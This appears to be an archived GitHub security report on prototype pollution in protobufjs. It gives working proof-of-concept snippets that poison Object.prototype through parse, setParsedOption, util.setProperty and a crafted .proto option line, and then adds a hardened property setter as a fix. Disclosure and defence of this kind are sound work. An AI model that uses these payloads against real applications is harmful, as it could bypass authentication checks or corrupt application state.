This repository was archived by the owner on Feb 13, 2026. It is now read-only.

Improperly Controlled Modification of Object Prototype Pollution via protobufjs #3013

@hackersontwohouse

Description

A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty.

Vulnerability Description

  • Using the parse function

```js
const protobuf = require("protobufjs");
protobuf.parse('option(a).constructor.prototype.verified = true;');
console.log({}.verified);
// returns true
```

  • Using the setParsedOption function of a ReflectionObject

```js
const protobuf = require("protobufjs");
function gadgetFunction(){
  console.log("User is authenticated");
}
// This will fail, but also pollute the prototype of Object
try {
  let obj = new protobuf.ReflectionObject("Test");
  obj.setParsedOption("unimportant!", gadgetFunction, "constructor.prototype.testFn");
} catch (e) {}
// Now we can make use of the new function on the polluted prototype
const a = {};
a.testFn();
// Prints "User is authenticated" to the console.
```

  • Using the function util.setProperty

```js
const protobuf = require("protobufjs");
protobuf.util.setProperty({}, "constructor.prototype.verified", true);
console.log({}.verified);
// returns true
```

  • With the proto.poc file containing the following line:

```proto
option(foo).constructor.prototype.verified = true;
```

CWE-1321
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
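
A defensive counterpart to the `util.setProperty` case above, added here as an example and not part of the original report or of protobufjs's own code. The hypothetical `naiveSetProperty` shows why the path `constructor.prototype.verified` ends up writing to `Object.prototype`, and the hypothetical `safeSetProperty` rejects such paths and only descends into own properties.

```javascript
// Added example; naiveSetProperty and safeSetProperty are hypothetical names,
// not protobufjs APIs.
const FORBIDDEN = new Set(["__proto__", "constructor", "prototype"]);

// Naive setter: follows inherited properties, so the segment "constructor"
// resolves to Object and "prototype" to Object.prototype.
function naiveSetProperty(dst, path, value) {
  const parts = path.split(".");
  let cur = dst;
  for (let i = 0; i < parts.length - 1; i++) {
    if (cur[parts[i]] === undefined) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return dst;
}

// Hardened setter: rejects dangerous segments and descends only into own,
// object-valued properties of dst.
function safeSetProperty(dst, path, value) {
  if (typeof path !== "string" || path === "") throw new TypeError("path must be a non-empty string");
  const parts = path.split(".");
  for (const p of parts) {
    if (p === "" || FORBIDDEN.has(p)) throw new Error("unsafe path segment: " + JSON.stringify(p));
  }
  let cur = dst;
  for (const key of parts.slice(0, -1)) {
    const own = Object.prototype.hasOwnProperty.call(cur, key) ? cur[key] : undefined;
    if (own === null || typeof own !== "object") cur[key] = {};
    cur = cur[key];
  }
  cur[parts[parts.length - 1]] = value;
  return dst;
}

// Runs both setters on the path from the report and restores Object.prototype.
function demo() {
  naiveSetProperty({}, "constructor.prototype.verified", true);
  const polluted = {}.verified === true;
  delete Object.prototype.verified; // clean up the demonstration
  let rejected = false;
  try { safeSetProperty({}, "constructor.prototype.verified", true); } catch (e) { rejected = true; }
  const nested = safeSetProperty({}, "a.b.c", 1);
  return { polluted, rejected, stillClean: {}.verified === undefined, nested };
}

console.log(demo());
```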
